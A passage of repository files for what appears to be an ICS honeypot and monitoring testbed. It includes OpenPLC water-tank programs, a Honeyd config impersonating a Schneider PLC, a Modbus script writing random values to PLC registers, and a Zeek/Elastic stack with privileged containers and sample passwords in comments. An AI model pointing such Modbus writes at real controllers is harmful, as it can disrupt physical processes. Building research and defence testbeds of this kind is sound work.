48 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
49 | TON1(IN := Discharging, PT := T#8s);
50 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
51 | Discharging := RS1.Q1;
52 | TimeDischarging := TON1.ET;
53 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
54 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
55 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
56 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
57 | Q_FillLight := Filling;
58 | Q_FillValve := Filling;
59 | Q_LightDischarge := Discharging;
60 | Q_DischargeValve := Discharging;
61 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
62 | Q_Display := _TMP_ADD57_OUT;
63 | END_PROGRAM
64 |
65 |
66 | CONFIGURATION Config0
67 |
68 | RESOURCE Res0 ON PLC
69 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
70 | PROGRAM instance0 WITH task0 : Main;
71 | END_RESOURCE
72 | END_CONFIGURATION
73 |
--------------------------------------------------------------------------------
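The Watertank.st latch above is easiest to sanity-check off-PLC: Filling is set by a rising edge of the fill button (blocked while Discharging) and reset-dominantly cleared when an 8 s on-delay timer expires, with the task scanning every 20 ms. A minimal Python model of just the filling half, under those assumptions (the class name and integer-millisecond timer are illustrative, not part of the repo):

```python
class WatertankModel:
    """Hypothetical model of the Filling branch of Watertank.st.

    One scan() call corresponds to one 20 ms task0 cycle. Milliseconds are
    tracked as integers to keep the TON comparison exact.
    """
    SCAN_MS = 20       # task0 INTERVAL := T#20ms
    FILL_MS = 8000     # TON0 PT := T#8s

    def __init__(self):
        self.filling = False
        self.discharging = False   # other branch, not modelled here
        self.prev_pb_fill = False  # R_TRIG0 internal state
        self.elapsed_ms = 0        # TON0 elapsed time

    def scan(self, pb_fill):
        # R_TRIG0: rising edge of the fill push-button
        rising = pb_fill and not self.prev_pb_fill
        self.prev_pb_fill = pb_fill
        # TON0: accumulates only while Filling is energised
        if self.filling:
            self.elapsed_ms += self.SCAN_MS
        else:
            self.elapsed_ms = 0
        timer_done = self.elapsed_ms >= self.FILL_MS
        # RS0 is reset-dominant: the timer reset (R1) wins over the set input
        if timer_done:
            self.filling = False
        elif rising and not self.discharging:
            self.filling = True
        return self.filling
```

Pressing the button once should latch Filling on for exactly 400 scans (8 s / 20 ms) before the timer drops it out again.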
/watertank/openplc/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM ubuntu:xenial
2 |
3 | USER root
4 | WORKDIR /root/
5 |
6 | RUN apt-get update
7 | RUN apt-get install -y build-essential \
8 | libpcap-dev \
9 | libdnet-dev \
10 | libevent-dev \
11 | libpcre3-dev \
12 | make \
13 | bzip2 \
14 | nmap \
15 | psmisc \
16 | libtool \
17 | libdumbnet-dev \
18 | zlib1g-dev \
19 | rrdtool \
20 | net-tools \
21 | git-core \
22 | libreadline-dev \
23 | libedit-dev \
24 | bison \
25 | flex \
26 | farpd \
27 | lftp \
28 | iputils-ping \
29 | sudo \
30 | automake \
31 | sqlite3
32 |
33 |
34 | WORKDIR /home/
35 | RUN git clone https://github.com/DataSoft/Honeyd.git
36 | RUN cd Honeyd \
37 | && ./autogen.sh \
38 | && ./configure \
39 | && make \
40 | && make install
41 |
42 |
43 |
44 |
45 |
46 | WORKDIR /home/
47 | ADD honeyd.conf .
48 | # RUN git clone https://github.com/thiagoralves/OpenPLC_v3.git
49 | # WORKDIR /home/OpenPLC_v3/
50 | # RUN ls -al install.sh
51 | # RUN sudo chmod +x install.sh
52 | # RUN sudo ./install.sh linux
53 |
54 | RUN sudo apt-get install -y build-essential pkg-config bison flex autoconf automake libtool make nodejs git
55 | RUN git clone https://github.com/thiagoralves/OpenPLC_v2
56 | WORKDIR /home/OpenPLC_v2/
57 | RUN sudo chmod +x ./build.sh
58 | RUN printf "n\n1\n" | ./build.sh
59 |
60 |
61 | EXPOSE 502
62 | EXPOSE 8080
63 |
64 |
65 | # CMD nohup honeyd -d -f /home/honeyd.conf &> honeyd.log; sudo nodejs /OpenPLC_v2/server.js
66 | CMD nohup honeyd -d -f /home/honeyd.conf > honeyd.log 2>&1 & sudo nodejs server.js
--------------------------------------------------------------------------------
/watertank/openplc/PLC1.st:
--------------------------------------------------------------------------------
1 | PROGRAM PLC1
2 | VAR
3 | level AT %IW0 : INT;
4 | Richiesta AT %QX0.2 : BOOL;
5 | request AT %IW1 : INT;
6 | pumps AT %QX0.0 : BOOL;
7 | valve AT %QX0.1 : BOOL;
8 | low AT %MX0.0 : BOOL;
9 | high AT %MX0.1 : BOOL;
10 | open_req AT %MX0.3 : BOOL;
11 | close_req AT %MX0.4 : BOOL;
12 | low_1 AT %MW0 : INT := 40;
13 | high_1 AT %MW1 : INT := 80;
14 | END_VAR
15 | VAR
16 | LE3_OUT : BOOL;
17 | GE7_OUT : BOOL;
18 | END_VAR
19 |
20 | LE3_OUT := LE(level, low_1);
21 | low := LE3_OUT;
22 | GE7_OUT := GE(level, high_1);
23 | high := GE7_OUT;
24 | open_req := Richiesta;
25 | close_req := NOT(Richiesta);
26 | pumps := NOT(high) AND (low OR pumps);
27 | valve := NOT(close_req) AND (open_req AND NOT(low) OR valve);
28 | END_PROGRAM
29 |
30 |
31 | CONFIGURATION Config0
32 |
33 | RESOURCE Res0 ON PLC
34 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
35 | PROGRAM instance0 WITH task0 : PLC1;
36 | END_RESOURCE
37 | END_CONFIGURATION
38 |
--------------------------------------------------------------------------------
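PLC1.st's pump and valve equations are self-latching (each output appears on the right-hand side of its own assignment), which makes the hysteresis easy to misread. A sketch of one scan cycle in Python, assuming `LE`/`GE` map to `<=`/`>=` and that ST's `AND` binds tighter than `OR` (the helper name and signature are made up for illustration):

```python
def plc1_scan(level, richiesta, pumps, valve, low_sp=40, high_sp=80):
    """One scan of the PLC1.st logic; returns the new (pumps, valve) state."""
    low = level <= low_sp           # LE(level, low_1)
    high = level >= high_sp         # GE(level, high_1)
    open_req = richiesta
    close_req = not richiesta
    # pumps latch on at low level, latch off at high level
    pumps = (not high) and (low or pumps)
    # valve opens on request (unless the tank is low) and closes on close_req
    valve = (not close_req) and ((open_req and not low) or valve)
    return pumps, valve
```

Between the setpoints (e.g. level 60) the pump keeps its previous state, which is the intended hysteresis band.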
/watertank/openplc/Watertank.st:
--------------------------------------------------------------------------------
1 | PROGRAM Main
2 | VAR
3 | I_PbFill AT %IX100.0 : BOOL;
4 | I_PbDischarge AT %IX100.1 : BOOL := True;
5 | Q_FillValve AT %QX100.0 : BOOL;
6 | Q_FillLight AT %QX100.1 : BOOL;
7 | Q_DischargeValve AT %QX100.2 : BOOL;
8 | Q_LightDischarge AT %QX100.3 : BOOL;
9 | Q_Display AT %QW100 : INT;
10 | END_VAR
11 | VAR
12 | Filling : BOOL;
13 | Discharging : BOOL;
14 | TimeFilling : TIME;
15 | TimeFillingInt : INT;
16 | TimeDischarging : TIME;
17 | TimeDischargingInt : INT;
18 | TON0 : TON;
19 | RS0 : RS;
20 | R_TRIG0 : R_TRIG;
21 | TON1 : TON;
22 | RS1 : RS;
23 | F_TRIG0 : F_TRIG;
24 | Placeholder : INT;
25 | END_VAR
26 | VAR
27 | Simulation AT %QW101 : INT;
28 | END_VAR
29 | VAR
30 | _TMP_NOT11_OUT : BOOL;
31 | _TMP_AND12_OUT : BOOL;
32 | _TMP_NOT21_OUT : BOOL;
33 | _TMP_AND22_OUT : BOOL;
34 | _TMP_TIME_TO_INT27_OUT : INT;
35 | _TMP_TIME_TO_INT28_OUT : INT;
36 | _TMP_ADD57_OUT : INT;
37 | END_VAR
38 |
39 | R_TRIG0(CLK := I_PbFill);
40 | _TMP_NOT11_OUT := NOT(Discharging);
41 | _TMP_AND12_OUT := AND(R_TRIG0.Q, _TMP_NOT11_OUT);
42 | TON0(IN := Filling, PT := T#8s);
43 | RS0(S := _TMP_AND12_OUT, R1 := TON0.Q);
44 | Filling := RS0.Q1;
45 | TimeFilling := TON0.ET;
46 | F_TRIG0(CLK := I_PbDischarge);
47 | _TMP_NOT21_OUT := NOT(Filling);
48 | _TMP_AND22_OUT := AND(F_TRIG0.Q, _TMP_NOT21_OUT);
49 | TON1(IN := Discharging, PT := T#8s);
50 | RS1(S := _TMP_AND22_OUT, R1 := TON1.Q);
51 | Discharging := RS1.Q1;
52 | TimeDischarging := TON1.ET;
53 | _TMP_TIME_TO_INT27_OUT := TIME_TO_INT(TimeFilling);
54 | TimeFillingInt := _TMP_TIME_TO_INT27_OUT;
55 | _TMP_TIME_TO_INT28_OUT := TIME_TO_INT(TimeDischarging);
56 | TimeDischargingInt := _TMP_TIME_TO_INT28_OUT;
57 | Q_FillLight := Filling;
58 | Q_FillValve := Filling;
59 | Q_LightDischarge := Discharging;
60 | Q_DischargeValve := Discharging;
61 | _TMP_ADD57_OUT := ADD(TimeFillingInt, TimeDischargingInt);
62 | Q_Display := _TMP_ADD57_OUT;
63 | END_PROGRAM
64 |
65 |
66 | CONFIGURATION Config0
67 |
68 | RESOURCE Res0 ON PLC
69 | TASK task0(INTERVAL := T#20ms,PRIORITY := 0);
70 | PROGRAM instance0 WITH task0 : Main;
71 | END_RESOURCE
72 | END_CONFIGURATION
73 |
--------------------------------------------------------------------------------
/watertank/openplc/honeyd.conf:
--------------------------------------------------------------------------------
1 | create schneider_m221
2 | set schneider_m221 personality "Schneider Electric TSX ETY programmable logic controller"
3 | set schneider_m221 default tcp action reset
4 | set schneider_m221 default icmp action open
5 | add schneider_m221 tcp port 502 proxy 0.0.0.0:502
6 | set schneider_m221 ethernet "28:29:86:F9:7C:6E"
7 |
--------------------------------------------------------------------------------
/watertank/openplc_sim/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:3.9-slim-buster
2 | ENV PYTHONUNBUFFERED=1
3 | COPY . /app
4 | WORKDIR /app
5 |
6 | RUN pip3 install -r requirements.txt
7 |
8 | CMD [ "python3", "tcp_modbus.py"]
9 |
--------------------------------------------------------------------------------
/watertank/openplc_sim/requirements.txt:
--------------------------------------------------------------------------------
1 | pymodbus==2.5.3
2 | pyserial==3.5
--------------------------------------------------------------------------------
/watertank/openplc_sim/tcp_modbus.py:
--------------------------------------------------------------------------------
1 | from pymodbus.client.sync import ModbusTcpClient
2 | import random
3 | import time
4 |
5 |
6 | host = '192.168.0.26'  # IP of your Modbus server
7 | port = 502
8 | client = ModbusTcpClient(host, port)
9 | while True:
10 |     client.connect()
11 |
12 |     # Build a list of random values to write to multiple registers
13 |     values = []
14 |     for i in range(2):
15 |         values.append(random.randint(10, 40))
16 |
17 |     # read_values = client.read_holding_registers(101, 2, unit=1)
18 |     # print(f"Read values: {read_values.registers}")
19 |
20 |     # Write the values to holding registers starting at address 101
21 |     wr = client.write_registers(101, values, unit=1)
22 |     time.sleep(0.1)
23 |
--------------------------------------------------------------------------------
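tcp_modbus.py only ever writes; confirming that the simulated values actually land in the PLC means reading them back. A hedged sketch against the pinned pymodbus 2.5.x API, with the payload generation pulled into a testable helper (the helper name is an assumption; host, port, and unit id are taken from the script above):

```python
import random

def make_register_values(n=2, low=10, high=40):
    """Mirror the write loop in tcp_modbus.py: n random ints in [low, high]."""
    return [random.randint(low, high) for _ in range(n)]

# Read-back sketch (pymodbus 2.5.x; needs a live Modbus server to run):
# from pymodbus.client.sync import ModbusTcpClient
# client = ModbusTcpClient('192.168.0.26', 502)
# client.connect()
# rr = client.read_holding_registers(101, 2, unit=1)
# print(rr.registers)  # should show the two values last written
```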
/zeek/docker-compose.yml:
--------------------------------------------------------------------------------
1 | version: "3.9"
2 | services:
3 | elasticsearch:
4 | build:
5 | context: ./elasticsearch
6 | dockerfile: Dockerfile
7 | stdin_open: true # docker run -i
8 | tty: true
9 | privileged: true
10 | environment:
11 | # - bootstrap.memory_lock=true
12 | - discovery.type=single-node
13 | # - ELASTICSEARCH_USERNAME=elastic
14 | # - ELASTIC_PASSWORD=Virtue@123
15 | # - xpack.security.enabled=true
16 | # - xpack.security.enabled=false
17 | ports:
18 | - "9200:9200"
19 | networks:
20 | - elastinet
21 |
22 | kibana:
23 | depends_on:
24 | - elasticsearch
25 | build:
26 | context: ./kibana
27 | dockerfile: Dockerfile
28 | stdin_open: true # docker run -i
29 | tty: true
30 | privileged: true
31 | environment:
32 | # - ELASTICSEARCH_USERNAME=elastic
33 | # - ELASTICSEARCH_PASSWORD=Virtue@123
34 | - xpack.reporting.enabled=false
35 | ports:
36 | - "5601:5601"
37 | links:
38 | - elasticsearch
39 | networks:
40 | - elastinet
41 |
42 | filebeat:
43 | depends_on:
44 | - kibana
45 | build:
46 | context: ./filebeat
47 | args:
48 | VERSION: 7.7.1
49 | dockerfile: Dockerfile
50 | stdin_open: true # docker run -i
51 | tty: true
52 | privileged: true
53 | # environment:
54 | # - ELASTICSEARCH_USERNAME=elastic
55 | # - ELASTICSEARCH_PASSWORD=Virtue@123
56 | links:
57 | - kibana
58 | - elasticsearch
59 | volumes:
60 | - pcap:/pcap
61 | command: -e
62 | networks:
63 | - elastinet
64 |
65 | zeek:
66 | # depends_on:
67 | # - filebeat
68 | build:
69 | context: ./zeek/elastic
70 | dockerfile: Dockerfile
71 | stdin_open: true # docker run -i
72 | tty: true
73 | privileged: true
74 | volumes:
75 | - pcap:/pcap
76 | cap_add:
77 | - NET_RAW
78 | network_mode: "host"
79 | # command: zeek -i af_packet::eth0 local
80 | entrypoint: ["zeek", "-i", "af_packet::ens160", "local" ]
81 |
82 | networks:
83 | elastinet:
84 | driver: bridge
85 | name: elastinet
86 | ipam:
87 | config:
88 | - subnet: 192.168.3.0/24
89 | gateway: 192.168.3.1
90 | driver_opts:
91 | com.docker.network.bridge.name: elastinet
92 |
93 |
94 |
95 | volumes:
96 | pcap:
--------------------------------------------------------------------------------
/zeek/elasticsearch/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM openjdk:11-jre
2 |
3 | LABEL maintainer "https://github.com/blacktop"
4 |
5 | RUN set -ex; \
6 | # https://artifacts.elastic.co/GPG-KEY-elasticsearch
7 | wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | apt-key add -
8 | # key='46095ACC8548582C1A2699A9D27D666CD88E42B4'; \
9 | # export GNUPGHOME="$(mktemp -d)"; \
10 | # gpg --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; \
11 | # gpg --export "$key" > /etc/apt/trusted.gpg.d/elastic.gpg; \
12 | # rm -rf "$GNUPGHOME"; \
13 | # apt-key list
14 |
15 | # https://www.elastic.co/guide/en/elasticsearch/reference/current/setup-repositories.html
16 | # https://www.elastic.co/guide/en/elasticsearch/reference/5.0/deb.html
17 | RUN set -x \
18 | && apt-get update && apt-get install -y --no-install-recommends apt-transport-https && rm -rf /var/lib/apt/lists/* \
19 | && echo 'deb https://artifacts.elastic.co/packages/7.x/apt stable main' > /etc/apt/sources.list.d/elasticsearch.list
20 |
21 | ENV ELASTICSEARCH_VERSION 7.10.2
22 | ENV ELASTICSEARCH_DEB_VERSION 7.10.2
23 | ENV ELASTIC_CONTAINER=true
24 |
25 | RUN set -x \
26 | \
27 | # don't allow the package to install its sysctl file (causes the install to fail)
28 | # Failed to write '262144' to '/proc/sys/vm/max_map_count': Read-only file system
29 | && dpkg-divert --rename /usr/lib/sysctl.d/elasticsearch.conf \
30 | \
31 | && apt-get update \
32 | && apt-get install -y --no-install-recommends "elasticsearch=$ELASTICSEARCH_DEB_VERSION" \
33 | && rm -rf /var/lib/apt/lists/*
34 |
35 | ENV PATH /usr/share/elasticsearch/bin:$PATH
36 |
37 | WORKDIR /usr/share/elasticsearch
38 |
39 | RUN set -ex \
40 | && for path in \
41 | ./data \
42 | ./logs \
43 | ./config \
44 | ./config/scripts \
45 | ./config/ingest-geoip \
46 | ; do \
47 | mkdir -p "$path"; \
48 | chown -R elasticsearch:elasticsearch "$path"; \
49 | done
50 |
51 | COPY config/elastic/elasticsearch.yml /etc/elasticsearch/elasticsearch.yml
52 | COPY config/x-pack/log4j2.properties /usr/share/elasticsearch/config/x-pack/
53 | COPY config/logrotate /etc/logrotate.d/elasticsearch
54 | COPY elastic-entrypoint.sh /
55 | COPY docker-healthcheck /usr/local/bin/
56 |
57 | VOLUME ["/usr/share/elasticsearch/data"]
58 |
59 | EXPOSE 9200 9300
60 | ENTRYPOINT ["/elastic-entrypoint.sh"]
61 | CMD ["elasticsearch"]
62 |
63 | # HEALTHCHECK CMD ["docker-healthcheck"]
64 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/VERSION:
--------------------------------------------------------------------------------
1 | x-pack
2 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/elastic/elasticsearch.yml:
--------------------------------------------------------------------------------
1 | cluster.name: "docker-cluster"
2 | network.host: 0.0.0.0
3 |
4 | # this value is required because we set "network.host"
5 | # be sure to modify it appropriately for a production cluster deployment
6 | discovery.seed_hosts: ["127.0.0.1", "[::1]"]
7 | # node.master: true
8 | # node.ingest: true
9 | # node.data: true
10 |
11 | action.auto_create_index: .security,.monitoring*,.watches,.triggered_watches,.watcher-history*,.ml*
12 | # discovery.type: "single-node"
13 |
14 | # bin/elasticsearch-keystore create
15 | # echo "changeme" | bin/elasticsearch-keystore add -x 'bootstrap.password'
16 |
17 | # xpack.security.authc.accept_default_password: true
18 | # xpack.security.transport.ssl.enabled: false
19 | # http -a elastic:changeme localhost:9200
20 | # curl -u elastic:changeme http://127.0.0.1:9200
21 |
22 | # bin/x-pack/setup-passwords \
23 | # auto --batch \
24 | # -Expack.ssl.certificate=x-pack/certificates/es01/es01.crt \
25 | # -Expack.ssl.certificate_authorities=x-pack/certificates/ca/ca.crt \
26 | # -Expack.ssl.key=x-pack/certificates/es01/es01.key \
27 | # --url https://localhost:9200
28 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/elastic/log4j2.properties:
--------------------------------------------------------------------------------
1 | status = error
2 |
3 | appender.console.type = Console
4 | appender.console.name = console
5 | appender.console.layout.type = PatternLayout
6 | appender.console.layout.pattern = [%d{ISO8601}][%-5p][%-25c{1.}] %marker%m%n
7 |
8 | rootLogger.level = info
9 | rootLogger.appenderRef.console.ref = console
10 |
11 | logger.xpack_security_audit_logfile.name = org.elasticsearch.xpack.security.audit.logfile.LoggingAuditTrail
12 | logger.xpack_security_audit_logfile.appenderRef.console.ref = console
13 | logger.xpack_security_audit_logfile.level = info
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/logrotate:
--------------------------------------------------------------------------------
1 | /var/log/elasticsearch/*.log {
2 | daily
3 | rotate 50
4 | size 50M
5 | copytruncate
6 | compress
7 | delaycompress
8 | missingok
9 | notifempty
10 | create 644 elasticsearch elasticsearch
11 | }
12 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/config/x-pack/log4j2.properties:
--------------------------------------------------------------------------------
1 | status = error
2 |
3 | appender.console.type = Console
4 | appender.console.name = console
5 | appender.console.layout.type = PatternLayout
6 | appender.console.layout.pattern = [%d{ISO8601}][%-5p][%-25c{1.}] %marker%m%n
7 |
8 | rootLogger.level = info
9 | rootLogger.appenderRef.console.ref = console
10 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/docker-healthcheck:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | set -eo pipefail
3 |
4 | host="$(hostname --ip-address || echo '127.0.0.1')"
5 |
6 | if health="$(curl -fsSL "http://$host:9200/_cat/health?h=status")"; then
7 | health="$(echo "$health" | sed -r 's/^[[:space:]]+|[[:space:]]+$//g')" # trim whitespace (otherwise we'll have "green ")
8 | if [ "$health" = 'green' ]; then
9 | exit 0
10 | fi
11 | echo >&2 "unexpected health status: $health"
12 | fi
13 |
14 | # If the probe returns 2 ("starting") when the container has already moved out of the "starting" state then it is treated as "unhealthy" instead.
15 | # https://github.com/docker/docker/blob/dcc65376bac8e73bb5930fce4cddc2350bb7baa2/docs/reference/builder.md#healthcheck
16 | exit 2
17 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/elastic-entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | umask 0002
6 |
7 | declare -a es_opts
8 |
9 | while IFS='=' read -r envvar_key envvar_value
10 | do
11 | # Elasticsearch env vars need to have at least two dot separated lowercase words, e.g. `cluster.name`
12 | if [[ "$envvar_key" =~ ^[a-z0-9_]+\.[a-z0-9_]+ ]]; then
13 | if [[ ! -z $envvar_value ]]; then
14 | es_opt="-E${envvar_key}=${envvar_value}"
15 | es_opts+=("${es_opt}")
16 | fi
17 | fi
18 | done < <(env)
19 |
20 | export ES_JAVA_OPTS="-Des.cgroups.hierarchy.override=/ $ES_JAVA_OPTS"
21 |
22 |
23 | if [[ -d bin/x-pack ]]; then
24 | # Check for the ELASTIC_PASSWORD environment variable to set the
25 | # bootstrap password for Security.
26 | #
27 | # This is only required for the first node in a cluster with Security
28 | # enabled, but we have no way of knowing which node we are yet. We'll just
29 | # honor the variable if it's present.
30 | if [[ -n "$ELASTIC_PASSWORD" ]]; then
31 | [[ -f /usr/share/elasticsearch/config/elasticsearch.keystore ]] || (echo "y" | elasticsearch-keystore create)
32 | if ! (elasticsearch-keystore list | grep -q '^bootstrap.password$'); then
33 | (echo "$ELASTIC_PASSWORD" | elasticsearch-keystore add -x 'bootstrap.password')
34 | fi
35 | fi
36 | fi
37 |
38 | # Add elasticsearch as command if needed
39 | if [ "${1:0:1}" = '-' ]; then
40 | set -- elasticsearch "$@"
41 | fi
42 |
43 | # Drop root privileges if we are running elasticsearch
44 | # allow the container to be started with `--user`
45 | if [ "$1" = 'elasticsearch' -a "$(id -u)" = '0' ]; then
46 | # Change the ownership of user-mutable directories to elasticsearch
47 | chown -R elasticsearch:elasticsearch /usr/share/elasticsearch/{data,logs,config}
48 |
49 | set -- chroot --userspec=elasticsearch / "$@" "${es_opts[@]}"
50 | fi
51 |
52 | exec "$@"
53 |
--------------------------------------------------------------------------------
/zeek/elasticsearch/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
5 | VERSION=$(grep '^ENV ELASTICSEARCH_VERSION' Dockerfile | cut -d" " -f3)
6 | TAGS=($VERSION 7)
7 |
8 | for TAG in "${TAGS[@]}"; do
9 | echo "===> Tagging $IMAGE_NAME as $DOCKER_REPO:$CACHE_TAG-$TAG"
10 | docker tag $IMAGE_NAME $DOCKER_REPO:$CACHE_TAG-$TAG
11 | echo "===> Pushing $DOCKER_REPO:$CACHE_TAG-$TAG"
12 | docker push $DOCKER_REPO:$CACHE_TAG-$TAG
13 | done
14 |
--------------------------------------------------------------------------------
/zeek/filebeat/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM alpine:3.12
2 |
3 | LABEL maintainer "https://github.com/blacktop"
4 |
5 | ARG VERSION
6 |
7 | RUN apk add --no-cache libc6-compat curl jq
8 |
9 | RUN \
10 | cd /tmp \
11 | && wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-${VERSION}-linux-x86_64.tar.gz \
12 | && tar xzvf filebeat-${VERSION}-linux-x86_64.tar.gz \
13 | && mv filebeat-${VERSION}-linux-x86_64 /usr/share/filebeat \
14 | && mkdir /usr/share/filebeat/logs /usr/share/filebeat/data \
15 | && rm /tmp/*
16 |
17 | ENV PATH $PATH:/usr/share/filebeat
18 |
19 | COPY config /usr/share/filebeat
20 |
21 | COPY entrypoint.sh /usr/local/bin/entrypoint
22 | RUN chmod +x /usr/local/bin/entrypoint
23 |
24 | WORKDIR /usr/share/filebeat
25 |
26 | ENTRYPOINT ["entrypoint"]
27 | CMD ["-h"]
--------------------------------------------------------------------------------
/zeek/filebeat/LATEST:
--------------------------------------------------------------------------------
1 | 7.7.1
--------------------------------------------------------------------------------
/zeek/filebeat/config/filebeat.yml:
--------------------------------------------------------------------------------
1 | filebeat.config:
2 | modules:
3 | path: ${path.config}/modules.d/*.yml
4 | reload.enabled: false
5 |
6 | # filebeat.autodiscover:
7 | # providers:
8 | # - type: docker
9 | # hints.enabled: true
10 |
11 | filebeat.modules:
12 | - module: zeek
13 | # All logs
14 | connection:
15 | enabled: true
16 | var.paths:
17 | - /pcap/conn*.log
18 | dns:
19 | enabled: true
20 | var.paths:
21 | - /pcap/dns*.log
22 | http:
23 | enabled: true
24 | var.paths:
25 | - /pcap/http*.log
26 | files:
27 | enabled: true
28 | var.paths:
29 | - /pcap/files*.log
30 | ssl:
31 | enabled: true
32 | var.paths:
33 | - /pcap/ssl*.log
34 | notice:
35 | enabled: true
36 | var.paths:
37 | - /pcap/notice*.log
38 |
39 | processors:
40 | - add_cloud_metadata: ~
41 |
42 | output.elasticsearch:
43 | hosts: '${ELASTICSEARCH_HOSTS:elasticsearch:9200}'
44 | username: '${ELASTICSEARCH_USERNAME:}'
45 | password: '${ELASTICSEARCH_PASSWORD:}'
46 |
47 | setup.kibana:
48 | host: '${KIBANA_HOST:kibana:5601}'
--------------------------------------------------------------------------------
/zeek/filebeat/entrypoint.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 |
3 | set -e
4 |
5 | geoipInfo(){
6 | ELASTICSEARCH_HOSTS=${ELASTICSEARCH_HOSTS:-elasticsearch:9200}
7 | echo "===> Adding geoip-info pipeline..."
8 | curl -s -X PUT "${ELASTICSEARCH_HOSTS}/_ingest/pipeline/geoip-info" -H 'Content-Type: application/json' -d'
9 | {
10 | "description": "Add geoip info",
11 | "processors": [
12 | {
13 | "geoip": {
14 | "field": "client.ip",
15 | "target_field": "client.geo",
16 | "ignore_missing": true
17 | }
18 | },
19 | {
20 | "geoip": {
21 | "field": "source.ip",
22 | "target_field": "source.geo",
23 | "ignore_missing": true
24 | }
25 | },
26 | {
27 | "geoip": {
28 | "field": "id.orig_h",
29 | "target_field": "source.geo",
30 | "ignore_missing": true
31 | }
32 | },
33 | {
34 | "geoip": {
35 | "field": "destination.ip",
36 | "target_field": "destination.geo",
37 | "ignore_missing": true
38 | }
39 | },
40 | {
41 | "geoip": {
42 | "field": "id.resp_h",
43 | "target_field": "destination.geo",
44 | "ignore_missing": true
45 | }
46 | },
47 | {
48 | "geoip": {
49 | "field": "server.ip",
50 | "target_field": "server.geo",
51 | "ignore_missing": true
52 | }
53 | },
54 | {
55 | "geoip": {
56 | "field": "host.ip",
57 | "target_field": "host.geo",
58 | "ignore_missing": true
59 | }
60 | }
61 | ]
62 | }
63 | '
64 | echo -e "\n * Done."
65 | }
66 | # Wait for elasticsearch to start. It requires that the status be either
67 | # green or yellow.
68 | waitForElasticsearch() {
69 | ELASTICSEARCH_HOSTS=${ELASTICSEARCH_HOSTS:-elasticsearch:9200}
70 | echo -n "===> Waiting on elasticsearch(${ELASTICSEARCH_HOSTS}) to start..."
71 | i=0;
72 | while [ $i -le 60 ]; do
73 | health=$(curl --silent "${ELASTICSEARCH_HOSTS}/_cat/health" | awk '{print $4}')
74 | if [[ "$health" == "green" ]] || [[ "$health" == "yellow" ]]
75 | then
76 | echo
77 | echo "Elasticsearch is ready!"
78 | return 0
79 | fi
80 |
81 | echo -n '.'
82 | sleep 1
83 | i=$((i+1));
84 | done
85 |
86 | echo
87 | echo >&2 'Elasticsearch is not running or is not healthy.'
88 | echo >&2 "Address: ${ELASTICSEARCH_HOSTS}"
89 | echo >&2 "$health"
90 | exit 1
91 | }
92 |
93 | # Wait for kibana to start
94 | waitForKibana() {
95 | echo -n "===> Waiting for kibana to start..."
96 | i=1
97 | while [ $i -le 20 ]; do
98 |
99 | status=$(curl --silent -XGET "http://${1:-kibana:5601}/api/status" | jq -r '.status.overall.state')
100 |
101 | if [[ "$status" = "green" ]] ; then
102 | echo "kibana is ready!"
103 | return 0
104 | fi
105 |
106 | echo -n '.'
107 | sleep 1
108 | i=$((i+1))
109 | done
110 |
111 | echo
112 | echo >&2 "kibana is not available"
113 | echo >&2 "Address: ${1:-kibana:5601}"
114 | }
115 |
116 | if [[ -z $1 ]] || [[ ${1:0:1} == '-' ]] ; then
117 | waitForElasticsearch
118 | # geoipInfo
119 | waitForKibana ${KIBANA_HOST:-kibana:5601}
120 | echo "===> Setting up filebeat..."
121 | filebeat setup --modules zeek -e -E 'setup.dashboards.enabled=true'
122 | echo "===> Starting filebeat..."
123 | exec filebeat "$@"
124 | fi
125 |
126 | exec "$@"
--------------------------------------------------------------------------------
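The geoip-info pipeline installed by entrypoint.sh repeats the same `geoip` processor seven times with only the field names changing. As a sanity check, the identical request body can be generated from a field table; a sketch using only the standard library (the `GEO_FIELDS` table mirrors the script above; the commented PUT endpoint is the one the script already targets):

```python
import json

# source field -> target geo field, exactly as in the curl payload above
GEO_FIELDS = {
    "client.ip": "client.geo",
    "source.ip": "source.geo",
    "id.orig_h": "source.geo",
    "destination.ip": "destination.geo",
    "id.resp_h": "destination.geo",
    "server.ip": "server.geo",
    "host.ip": "host.geo",
}

def geoip_pipeline_body():
    """Build the geoip-info ingest pipeline body as a JSON string."""
    return json.dumps({
        "description": "Add geoip info",
        "processors": [
            {"geoip": {"field": f, "target_field": t, "ignore_missing": True}}
            for f, t in GEO_FIELDS.items()
        ],
    })

# To install it (network call, shown for context only):
# import urllib.request
# req = urllib.request.Request(
#     "http://elasticsearch:9200/_ingest/pipeline/geoip-info",
#     data=geoip_pipeline_body().encode(),
#     headers={"Content-Type": "application/json"},
#     method="PUT",
# )
# urllib.request.urlopen(req)
```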
/zeek/filebeat/hooks/build:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | docker build --build-arg VERSION=$VERSION -t $IMAGE_NAME .
--------------------------------------------------------------------------------
/zeek/filebeat/hooks/post_push:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | set -e
4 |
